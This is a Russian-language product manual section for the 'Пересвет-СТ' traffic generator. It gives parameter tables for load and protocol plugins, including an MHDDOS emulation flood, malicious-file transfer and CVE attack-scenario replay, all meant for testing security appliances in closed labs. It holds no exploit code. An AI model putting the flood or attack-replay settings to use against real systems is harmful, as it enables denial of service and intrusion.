Query параметрыПараметры, передаваемые в URL после знака вопроса (?)Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
Тело запросаЧасть HTTP-запроса, содержащая данные, которые клиент отправляет серверу (например, форму или JSON) Параметр доступен если выбраны методы: POST, PUT или PATCHЗаполните поле «тело запроса» следующим образом: Введите значение тело запроса ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Значения по умолчанию: «Accept»:« */*»; «Accept-Encoding»:« gzip,deflate,br»; «Accept-Language»:«ru-RU,ru;q=0.9,en-US,en;q=0.7»; «Cache-Control»:«max-age=0»; «Sec-Fetch-Mode»:«navigate»; «Sec-Fetch-Site»:«same-origin»; «Sec-Fetch-User»:«71»; «Sec-Fetch-Dest»:«document»; «Pragma»:«no-cache»; Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 158;

Табл. 158 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение Значение по умолчанию: «10»
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение Значение по умолчанию: «0»
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение Значение по умолчанию: «1»
Макс. стримов (на сессию)Максимальное количество потоков данных, которые могут быть активны в одной сессии. Параметр доступен только при включении H2 в «Параметрах HTTP».Задайте числовое значение Значение по умолчанию: «20»
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение Значение по умолчанию: «0»

После включения подплагинов необходимо указать длительность работы плагина MHDDOS Emulation

Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 159.

Табл. 159 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

DNS over TCP, DNS over TLS и DNS over HTTP

Плагины DNS over TCP, DNS over TLS и DNS over HTTP используются для проверки DNS-инфраструктуры в разных транспортных режимах.

  • DNS over TCP устанавливает TCP-сессию и передает DNS-запросы внутри нее;
  • DNS over TLS дополнительно использует TLS и подходит для проверки защищенных DNS-резолверов;
  • DNS over HTTP передает DNS-запросы через HTTP/HTTPS и позволяет тестировать DoH-сценарии.

Табл. 72.1 – Параметры DNS over TCP/TLS/HTTP

НазваниеОписаниеЗначение
ИсточникиАгент, интерфейс и сеть, с которых отправляются DNS-запросыВыберите агент, интерфейс и сеть отправителя
ЦелиDNS-сервер или сеть получателяВыберите сеть получателя или внешний адрес
DNS-шаблоныДоменные имена, типы DNS-записей и шаблоны запросовУкажите имена и типы записей, которые должны запрашиваться
QPSКоличество DNS-запросов в секундуЗадайте требуемую интенсивность
Параметры сессииОбщее число сессий и скорость их открытияИспользуется для TCP, TLS и HTTP-вариантов
TLSНастройки защищенного соединенияИспользуется для DNS over TLS и HTTPS-варианта DNS over HTTP
HTTPМетод, путь, заголовки и параметры HTTP-запросаИспользуется для DNS over HTTP
ДлительностьВремя генерации DNS-трафикаУкажите значение в секундах, минутах или часах

Передача файлов (HTTP)

Плагин «Передача файлов (HTTP)» эмулирует загрузку и скачивание пользовательских файлов по HTTP или HTTPS. Он используется для проверки пропускной способности файловых сервисов, антивирусных шлюзов, прокси, DLP/NGFW и средств мониторинга.

Перед настройкой плагина загрузите файлы в раздел Библиотека → Пользовательские файлы и дождитесь их синхронизации с агентами.

Табл. 72.2 – Параметры «Передача файлов (HTTP)»

НазваниеОписаниеЗначение
ИсточникиАгент и сеть, которые инициируют передачу файлаВыберите клиентского агента, интерфейс и сеть
ЦелиСерверная сторона или внешняя цельВыберите сеть получателя или внешний адрес
Выбор файловФайлы из библиотеки, которые будут передаваться в задачеНажмите «Выбрать файлы» и отметьте нужные объекты
HTTPsВключение передачи через HTTPSВключить/выключить
Версия HTTPHTTP/1.1 или HTTP/2Выберите версию протокола
МетодМетод передачиОбычно используется GET или POST в зависимости от сценария
ЗаголовкиДополнительные HTTP-заголовкиУкажите значения вручную или через макросы
Параметры сессииКоличество одновременных сессий, CPS и RPSЗадайте нагрузочный профиль
ДлительностьВремя работы плагинаУкажите длительность теста

Для серверной конфигурации этого плагина выбирается агент, интерфейс, сеть, HTTP/TLS-параметры и длительность работы серверной стороны. Сервер должен быть добавлен в задачу, если тест проводится в двухстороннем режиме «клиент Пересвет-СТ → сервер Пересвет-СТ».

Передача вредоносных файлов (HTTP)

Плагин «Передача вредоносных файлов (HTTP)» использует библиотеку PTI-файлов для проверки средств защиты. Сценарий предназначен для закрытого тестового контура и согласованных проверок антивирусных шлюзов, NGFW, IDS/IPS, почтовых и файловых систем защиты.

Перед запуском необходимо импортировать пакет вредоносных файлов в Библиотека → Вредоносные файлы (PTI). После импорта в библиотеке доступны фильтры и список файлов.

Табл. 72.3 – Параметры «Передача вредоносных файлов (HTTP)»

НазваниеОписаниеЗначение
Выбор файловНабор PTI-файлов, которые будут передаватьсяВыберите файлы из библиотеки по фильтрам или вручную
HTTP/TLSВерсия HTTP, HTTPS, TLS и сертификатыНастройте как в обычном HTTP-сценарии
СессииКоличество параллельных передач и скорость открытия соединенийЗадайте безопасный профиль нагрузки для стенда
RPSКоличество запросов в секунду на сессиюИспользуйте ограничение, чтобы не перегрузить средство защиты
ДлительностьВремя выполнения сценарияУкажите длительность или остановите задачу вручную

RoCEv2 (beta)

RoCEv2 используется для генерации трафика RDMA over Converged Ethernet v2. Сценарий предназначен для проверки сетей ЦОД, систем хранения, HPC/AI-кластеров и фабрик с поддержкой lossless Ethernet.

Табл. 72.4 – Параметры RoCEv2

НазваниеОписаниеЗначение
Команда RDMAТип RDMA-операцииВыберите команду, например write
Количество Queue PairКоличество параллельных RDMA-очередейЗадайте число QP, по умолчанию 1000
InfiniBand MTUРазмер MTU для RoCEv2-обменаВыберите значение, соответствующее стенду
Начальная скоростьНачальная интенсивность передачиИспользуется для плавного старта нагрузки
Шаг увеличения скоростиИзменение интенсивности во времениУкажите шаг ramp-up, если нужно наращивать нагрузку
CNPГенерация Congestion Notification PacketsВключите, если нужно проверить реакцию сети на уведомления о перегрузке
Интервал CNPИнтервал отправки CNPУказывается в микросекундах
PFCPriority Flow ControlВключите для проверки lossless-классов трафика
Класс PFCПриоритетный класс PFCУкажите класс, например 3
DCQCNУправление перегрузкой DCQCNВключите для проверки поведения при перегрузке
Параметры DCQCNG, AI Rate, Alpha, Recovery, Byte CounterНастройте в соответствии с профилем ЦОД
PayloadРазмер и содержимое полезной нагрузкиЗадайте профиль данных
ДлительностьВремя генерации RoCEv2-трафикаУкажите длительность теста

Elephant Flow TCP и Elephant Flow UDP

Elephant Flow используется для проверки длинных потоков, которые занимают значительную часть полосы пропускания. TCP-вариант работает с сессиями и управлением соединением, UDP-вариант генерирует поток без установки соединения.

Табл. 72.5 – Параметры Elephant Flow

НазваниеОписаниеЗначение
ИсточникиАгент и сеть отправителяВыберите клиентский агент, интерфейс и сеть
ЦелиАгент или сеть получателяВыберите серверную сторону или внешнюю цель
Размер кадраL2-размер кадра, включая Ethernet-заголовокОт 64 до 9600 байт, по умолчанию 1514
Общее количество сессийКоличество параллельных TCP-потоковИспользуется для TCP-варианта
CPSСкорость открытия TCP-сессийИспользуется для TCP-варианта
PPS на соединениеОграничение пакетов в секунду на одно соединение0 означает отсутствие ограничения
PPSСкорость генерации UDP-пакетовИспользуется для UDP-варианта
TCP заголовокMSS, окно, sequence numberИспользуется для TCP-варианта
ДлительностьВремя работы потоковУкажите длительность теста

Измерение сходимости L2 (UDP)

Плагин «Измерение сходимости L2 (UDP)» используется для измерения времени потери и восстановления трафика при переключениях в сети. Клиентская сторона отправляет UDP-потоки, серверная сторона принимает их и позволяет оценить период недоступности.

Табл. 72.6 – Параметры измерения сходимости L2

НазваниеОписаниеЗначение
ИсточникиАгент, интерфейс и сеть отправителяВыберите сторону, с которой будет идти UDP-поток
ЦелиАгент, интерфейс и сеть получателяВыберите сторону приема
Количество потоковЧисло независимых UDP-потоковМинимум 1 поток
PPSИнтенсивность отправки пакетовЗадайте скорость, достаточную для точного измерения
PayloadПолезная нагрузка UDP-пакетовНастройте размер и содержимое при необходимости
ДлительностьПериод измеренияДолжен покрывать момент переключения или отказа

PCAP Replay

PCAP Replay воспроизводит трафик из загруженного PCAP/PCAPNG-файла. В версии 2.1 сценарий поддерживает два режима: stateless-воспроизведение сырых пакетов и stateful-воспроизведение выбранных TCP/UDP-сессий с учетом параметров задачи.

PCAP-файлы загружаются в разделе Библиотека → PCAP-файлы.

Библиотека PCAP-файлов

Рис. 72.1 – Библиотека PCAP-файлов

Табл. 72.7 – Параметры PCAP Replay

НазваниеОписаниеЗначение
PCAP файлФайл из библиотеки, который будет воспроизводитьсяНажмите «Выбрать PCAP файл»
РежимСпособ воспроизведенияStateless - отправка пакетов из записи; Stateful - воспроизведение TCP/UDP-сессий
СессииTCP/UDP-сессии, обнаруженные в PCAPВыберите одну или несколько сессий для stateful-режима
ЦиклПовтор воспроизведения после завершения файлаВключить/выключить
Следовать таймингамСохранение темпа оригинальной записиВключите, если нужно повторить реальную динамику обмена
Закрытие сессииПоведение после завершения выбранной сессииПо PCAP, всегда закрывать или не закрывать автоматически
Замена L2Замена MAC-адресов из PCAP значениями задачиИспользуйте, если запись сделана в другой L2-среде
Замена L3Замена IP-адресов из PCAP значениями источников и целейИспользуйте для переноса сценария на другой стенд
Замена L4Замена портов источника и назначенияИспользуйте при необходимости адаптировать 4-tuple
IP клиента/сервераАдреса сторон, определенные по выбранной сессииЗаполняются автоматически после выбора сессии или вручную
Пользовательские правилаПоиск и замена в пакетеHex, строка или regex; область: Ethernet, IP, L4, payload или весь пакет
L7 правилаПоиск и замена в прикладных данныхИспользуется для изменения HTTP-тел, токенов, путей и других L7-значений
Исправлять Content-LengthАвтоматический пересчет HTTP Content-Length после L7-заменыВключите, если замена меняет размер тела HTTP-сообщения
PPS/CPSСкорость отправки пакетов или открытия сессийЗависит от выбранного режима
ДлительностьВремя работы сценарияУкажите длительность или используйте цикл

Если выбранный PCAP не содержит нужных сессий, проверьте направление трафика, наличие TCP/UDP-обмена и корректность загрузки файла в библиотеку.

Динамические приложения

Динамическое приложение - это пользовательский сценарий, созданный из PCAP-файла. В отличие от простого PCAP Replay, приложение можно параметризовать: выделить изменяемые значения в запросах или ответах и управлять ими при запуске задачи.

Библиотека динамических приложений

Рис. 72.2 – Библиотека динамических приложений

Мастер создания динамического приложения состоит из следующих шагов:

  1. Загрузка PCAP - выбор файла, название, описание и теги приложения.
  2. Выбор клиента - выбор IP-адреса стороны, которая инициирует соединения.
  3. Сессии - просмотр найденных TCP/UDP-сессий и назначение понятных имен.
  4. Параметризация - выделение изменяемых участков в hex-представлении или поиск по тексту, hex или regex.
  5. Обзор и сохранение - проверка сессий и параметров.
  6. Значения по умолчанию - пользователи, скорость, таймаут и поведение параметров.
  7. Сохранение - публикация приложения в библиотеке.

Табл. 72.8 – Параметры динамического приложения при запуске задачи

НазваниеОписаниеЗначение
ПриложенияОдно или несколько приложений из библиотекиВыберите приложения в модальном окне
Режим распределенияКак делить нагрузку между приложениямиВес или процент
Количество пользователейОбщее число параллельных пользователейРаспределяется между выбранными приложениями
CPSСкорость старта пользовательских сессийЗадайте общее значение для сценария
ТаймаутМаксимальное ожидание ответаПо умолчанию 30 секунд
Режим скоростиОригинальные тайминги, множитель скорости или целевая скоростьВыберите режим в зависимости от цели теста
Целевая скоростьОбщая скорость трафикаУказывается в bps, Kbps, Mbps или Gbps
Следовать таймингамСохранение задержек из оригинального PCAPВключено для режимов, где важна реальная динамика
Замена портовЗамена L4 source/destination portИспользуйте для переноса сценария на другой стенд
Параметры клиента/сервераЗначения, выделенные при создании приложенияМогут быть статическими, списком, случайными, инкрементальными или извлекаемыми из ответа

Табл. 72.9 – Источники значений параметров динамического приложения

ИсточникОписаниеПример применения
СтатическоеОдно значение для всех сессийОдин логин, домен или токен
СписокЗначения используются по кругуНабор пользователей или URL
СлучайноеСлучайное целое число в диапазонеНомер заказа, идентификатор клиента
ИнкрементПрефикс + начальное значение + шагuser_1, user_2, user_3
ИзвлечениеЗначение берется из ответа сервера и подставляется в следующие запросыSession ID, CSRF token, cookie

Сетевые уязвимости (CVE)

Плагин «Сетевые уязвимости (CVE)» воспроизводит сетевые сценарии из библиотеки PTI. Он используется для проверки IDS/IPS, NGFW, WAF, NDR и других средств обнаружения. Сценарии должны запускаться только в закрытом тестовом контуре.

Перед настройкой задачи загрузите или обновите базу в разделе Библиотека → Сетевые уязвимости (PTI). В карточках CVE отображаются CVE ID, продукт, версия, протокол, CVSS, описание и варианты воспроизведения.

Табл. 72.10 – Параметры CVE Replay

НазваниеОписаниеЗначение
CVEОдин или несколько сценариев из библиотекиВыберите записи через фильтры или поиск
Режим вариантаКак выбирать вариант воспроизведения, если у CVE их несколькоПервый вариант или случайный вариант
Quick TestБыстрый запуск для проверки воспроизводимостиВключите для короткой проверки перед нагрузочным тестом
Таймаут шагаМаксимальное ожидание шага сценарияПо умолчанию 30 секунд, 0 - отключено
Параметры сессииКоличество сессий и скорость открытияНастройте нагрузочный профиль
TLSИспользуется для сценариев, где обмен идет через защищенное соединениеВыберите сертификаты и параметры TLS
ДлительностьВремя работы сценарияЗадайте длительность или используйте quick test

При анализе результатов учитывайте, что успешное прохождение сценария означает, что тестовый обмен был воспроизведен. Итоговую оценку эффективности средства защиты следует делать по его событиям, блокировкам, логам и метрикам Пересвет-СТ.

HAR Replay

HAR Replay воспроизводит HTTP-сценарии из HAR-файлов, экспортированных из браузера или инструментов разработчика. Сценарий полезен для повторения реального пользовательского пути: авторизация, переходы по страницам, загрузка ресурсов, обращение к API.

Табл. 72.11 – Параметры HAR Replay

НазваниеОписаниеЗначение
HAR файлФайл HTTP Archive из библиотекиВыберите файл в модальном окне
ЦиклПовторять сценарий после завершенияВключить/выключить
СкоростьМножитель скорости воспроизведения1.0 соответствует исходной скорости
RPSОграничение запросов в секунду0 означает отсутствие отдельного ограничения
Следовать таймингамИспользовать задержки из HARВключите для реалистичного пользовательского сценария
TLSИспользовать защищенное соединениеВключите для HTTPS-сценариев
Keep-aliveПереиспользование HTTP-соединенийРекомендуется оставить включенным для браузерных сценариев
Порог паузыМаксимальная пауза, сохраняемая из записиДлинные паузы можно сжимать
Версия HTTPHTTP/1.1 или HTTP/2Выберите в соответствии с тестируемым сервисом

IPsec и сетевые туннели

В версии 2.1 сетевые туннели вынесены в отдельный раздел библиотеки. Туннель выбирается в настройках плагина через группу Сетевые туннели. Один объект может содержать один или несколько слоев: VLAN, VXLAN, GRE, MPLS, IP-IP или IPsec.

Для IPsec доступны массовые сценарии туннелирования. Оптимизации IPsec в версии 2.1 позволяют строить высоконагруженные тесты с большим количеством одновременных туннелей; опубликованные результаты производительности доступны в разделе Benchmarks.

Табл. 72.12 – Основные параметры IPsec

НазваниеОписаниеЗначение
SPIИдентификатор Security Parameter IndexHex-значение, например 0x12345678
Алгоритм шифрованияАлгоритм ESP-шифрованияAES-256-GCM, AES-192-GCM или AES-256-CBC
Ключ шифрованияКлюч для выбранного алгоритмаHex-строка нужной длины
Режим IPsecTransport или TunnelTransport - без внешнего IP-заголовка; Tunnel - с инкапсуляцией
Метод аутентификацииPSK или RSA-сертификатВыберите способ IKE-аутентификации
Pre-Shared KeyОбщий секрет для PSKЗаполните при выборе PSK
Сертификат и ключПути или объекты сертификата и приватного ключаЗаполните при выборе RSA
Алгоритмы IKEШифрование, группа Diffie-Hellman и PRFВыберите набор, согласованный со стендом
Traffic SelectorsДиапазоны защищаемых IP-адресовSource/Destination IP начало и конец
Emulated SubnetВнутренние IP-диапазоны за сторонами туннеляИспользуется для tunnel mode и массовых сценариев
SA LifetimeВремя жизни Security Association0 - без ограничения
Rekey TimeИнтервал пересогласования ключей0 - без rekey
DPDDead Peer DetectionИнтервал и таймаут проверки доступности пира
Multi P2 over P1Количество Child SA в рамках одного IKE SA1 - стандартный режим, максимум 8
Public Peer IncrementИнкрементальная генерация peer IPBase Peer IP и количество пиров
NAT-TИнкапсуляция ESP в UDP:4500Включите при прохождении через NAT
PFSPerfect Forward SecrecyВключите, если требуется новый DH-обмен при rekey

BGP L2VPN (VPLS/VPWS)

BGP L2VPN используется для проверки L2VPN-сценариев: VPLS, VPWS, MPLS-меток и BGP-пиров. Плагин применяется в стендах операторских сетей, MPLS/VPN и сервисов L2-connectivity.

Табл. 72.13 – Параметры BGP L2VPN

НазваниеОписаниеЗначение
BGP peerЛокальный адрес, peer address, local AS, peer ASУкажите параметры BGP-соседства
Hold timeВремя удержания BGP-сессииПо умолчанию 90 секунд
TTL и ToSIP-параметры BGP-пакетовУкажите при необходимости
Address FamiliesСемейства адресов BGPНапример ipv4-unicast, ipv6-unicast, labeled-unicast, EVPN
VPLS instance IDИдентификатор VPLS-инстансаЗадайте номер инстанса
VPLS IDИдентификатор VPLS-сервисаЗадайте сервисный идентификатор
SignalingТип сигнализацииLDP или BGP
Local VE IDЛокальный VE IDИспользуется для VPLS/VPWS
Remote PEАдрес удаленного PEИспользуется для VPWS
Route DistinguisherRD для VPN-маршрутовНапример 65000:100
Route TargetRT import/exportУкажите RT в формате, принятом на стенде
Local label baseБазовая MPLS-меткаИспользуется для генерации меток
PW TypeТип pseudowireНапример ethernet
Control WordИспользование control wordВключить/выключить
MTUMTU сервиса0 - значение по умолчанию

Серверные плагины Data Plane

HTTP

HTTP – плагин для получения различного веб-трафика.

Данный плагин состоит из следующих параметров:

  1. Получатель – совокупность из выбранного агента, интерфейсов и MAC-адресов, на которая будет принимать трафик. Описание параметров указаны в Табл. 160;

Табл. 160 – Параметры «Получатель»

НазваниеОписаниеЗначение
АгентАгент, который будет принимать трафик.Выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, который будет принимать трафикВыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети»), параметры которого будут использоваться для приема трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».Выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
  1. IP заголовок (L3) - параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 161;

Табл. 161 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 162;

Табл. 162 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 163;

Табл. 163 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера, если выбран вариант "Да", то заполните параметры TLS, согласно таблицу 156)
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.Выберите значение HTTP 1.1 или HTTP 2.0
HTTP методМетод, используемый для ответа агента на получаемые запросы.Выберите из следующего списка: GET POST PUT PATCH DELETE
Тело запросаЧасть HTTP-запроса, содержащая данные, которые сервер отправляет на получаемый запрос (например, форму или JSON). Параметр доступен если выбраны методы: POST, PUT или PATCHЗаполните поле «тело запроса» следующим образом: Введите значение тело запроса ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя

Табл. 164 – Параметры «Параметры TLS»

НазваниеОписаниеЗначение
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером (Параметр доступен, если параметр HTTPs включен)Выберите значение TLS v1.2 или TLS v1.3
SSL-сертификатВыбор SSL-сертификата, используемого для установления TLS-соединения (сертификат сервера)Выберите значение
SSL шифрысписок/набор криптографических наборов (cipher suites), которые сервер будет предлагать/принимать при рукопожатииВыберите значение
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 165;

Табл. 165 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Тайм-аут сессийМаксимальное время, в течение которого сессия между клиентом и сервером считается активной и действительной без необходимости её обновления или повторного установления.Задайте числовое значение и выберите величину (в секундах, минутах или часах)
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 166.

Табл. 166 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность приёма трафикаВремя в течении которого агент будет принимать входящий трафик и отвечать на негоЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

Control Plane

Control Plane описывает управляющие сетевые протоколы задачи: интерфейсы, LAG/MLAG, VxLAN, маршрутизацию, MPLS/L2VPN, multicast, OAM и BGP-расширения. Этот раздел используется, когда нужно не только передать пользовательский трафик, но и поднять вокруг тестируемого оборудования полноценную управляющую плоскость.

Для перехода к настройке Control Plane необходимо открыть задачу и выбрать нужный агент, затем нажать кнопку «Редактирование маршрутизации». В левой панели отображается дерево настроек, включающее:

  • Основные настройки — общие параметры;
  • Интерфейс — настройка сетевого интерфейса агента внутри Control Plane;
  • VxLAN — настройка VxLAN-туннелирования (overlay-сеть);
  • Протоколы: IS-IS, OSPFv2, OSPFv3, BGP, LDP, LLDP, BFD, RIP, PIM, IGMP/MLD Querier, EVPN, VPLS, VPWS, Pseudowire, MLDP, MPLS OAM, MPLS-TP, Link OAM, BGP-LS и BGP FlowSpec.

Протоколы Control Plane настраиваются как отдельные инстансы. Часть протоколов затем привязывается к сетевому интерфейсу задачи, часть использует уже созданные BGP или LDP-сессии. Если в задаче используется несколько агентов или несколько интерфейсов, проверяйте совпадение instance-id в настройках протокола и в привязке интерфейса: именно по этому идентификатору Пересвет-СТ понимает, какой протокол должен работать на конкретной стороне стенда.

Для удобства настройки рекомендуется сначала создать базовые элементы Control Plane: сетевой интерфейс, при необходимости BGP/LDP/IGP-сессию, а затем добавить дополнительные сервисы. После запуска задачи состояние протоколов анализируется на вкладках Control Plane, Метрики, События и Логи: там отображаются соседства, сессии, события, счетчики переданных сообщений и ошибки согласования.

После внесения всех изменений необходимо нажать кнопку «+ Сохранить» в правом верхнем углу страницы.


Интерфейс

Раздел «Интерфейс» задаёт базовые параметры сетевого интерфейса агента, через который будет осуществляться взаимодействие с тестируемым устройством.

ПолеОписание
Имя интерфейсаИмя сетевого интерфейса (заполняется автоматически, например 0000:01:00.0)
VLANИдентификатор VLAN. Значение 0 означает отсутствие тегирования
MTUМаксимальный размер передаваемого блока данных в байтах. Значение 0 означает использование значения по умолчанию
Исходная сеть (наш IP)IP-адрес источника в формате CIDR, например 10.0.0.0/24
Целевая сеть (Gateway)IP-адрес шлюза (следующего хопа), например 10.0.0.1

LAG/MLAG

LAG (Link Aggregation Group) и MLAG (Multi-Chassis Link Aggregation) настраиваются в разделе Control Plane страницы задачи. Позволяют объединять несколько физических каналов в единый логический, увеличивая пропускную способность и обеспечивая отказоустойчивость соединения при тестировании.

VxLAN

VxLAN (Virtual Extensible LAN) — технология сетевой виртуализации, описанная в RFC 7348. Позволяет создавать логические сети второго уровня (overlay) поверх существующей IP-инфраструктуры (underlay) путём инкапсуляции Ethernet-кадров в UDP-пакеты. Пересвет-СТ поддерживает генерацию и приём трафика внутри VxLAN-туннелей, что позволяет тестировать оборудование ЦОД и сетевые фабрики, использующие VxLAN в качестве overlay-транспорта.

При включении VxLAN весь генерируемый трафик (TCP, UDP, HTTP и др.) автоматически инкапсулируется в VxLAN-заголовки: к каждому пакету добавляется внешний Ethernet-заголовок, внешний IP-заголовок с адресами VTEP, UDP-заголовок с портом назначения 4789 и VxLAN-заголовок с идентификатором VNI. Входящий трафик автоматически декапсулируется и обрабатывается соответствующим плагином.

Ограничения: VxLAN и VLAN не могут использоваться одновременно на одном интерфейсе. При включении VxLAN поле «VLAN» в настройках интерфейса должно быть равно 0.

Основные настройки VxLAN

ПолеОписаниеЗначение по умолчанию
Включить VxLANВключение/выключение VxLAN-инкапсуляции на данном интерфейсеВыкл.
VNIVxLAN Network Identifier — 24-битный идентификатор виртуальной сети. Допустимые значения: от 1 до 16777215 (0xFFFFFF). Все пакеты будут маркированы данным VNI, а входящие пакеты с другим VNI будут отброшены

Настройки VTEP (Virtual Tunnel Endpoint)

VTEP — это конечная точка VxLAN-туннеля. Пересвет-СТ эмулирует локальный VTEP и направляет инкапсулированный трафик на удалённый VTEP тестируемого устройства.

ПолеОписаниеЗначение по умолчанию
Локальный VTEP IPIP-адрес (или начальный адрес диапазона) локального VTEP. Используется как Source IP во внешнем IP-заголовке VxLAN-пакетов
Количество локальных VTEPКоличество локальных VTEP-адресов в диапазоне. Адреса назначаются последовательно, по одному на каждую очередь обработки (CPU core). Например, при значении 4 и базовом адресе 10.0.0.1 будут использованы адреса 10.0.0.110.0.0.41
Удалённый VTEP IPIP-адрес (или начальный адрес диапазона) удалённого VTEP — адрес тестируемого устройства. Используется как Destination IP во внешнем IP-заголовке
Количество удалённых VTEPКоличество удалённых VTEP-адресов в диапазоне. Значение 1 — все очереди направляют трафик на один удалённый VTEP. При значении, равном количеству очередей, каждая очередь использует свой удалённый VTEP1

